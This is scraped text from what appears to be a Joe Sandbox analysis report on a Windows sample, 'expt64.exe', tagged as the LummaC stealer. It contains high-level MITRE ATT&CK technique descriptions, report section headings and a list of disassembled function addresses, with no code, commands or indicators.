Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report expt64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
expt64.exe

Function 022F0CBF Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 022F05AF Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 399
threadCOMMON

Function 022F0B6F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 023410C4 Relevance: 6.1, APIs: 4, Instructions: 99
memoryCOMMON

Function 02341F34 Relevance: 4.8, APIs: 3, Instructions: 325
memoryCOMMON

Function 023432E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 023411BF Relevance: 3.0, APIs: 2, Instructions: 48
memoryCOMMON

Function 023278FF Relevance: 40.3, Strings: 32, Instructions: 339
COMMON

Function 022FE6A1 Relevance: 29.0, Strings: 23, Instructions: 243
COMMON

Function 0230FDBC Relevance: 18.3, Strings: 14, Instructions: 821
COMMON

Function 0231244C Relevance: 16.7, Strings: 13, Instructions: 419
COMMON

Function 02327F95 Relevance: 12.8, Strings: 10, Instructions: 278
COMMON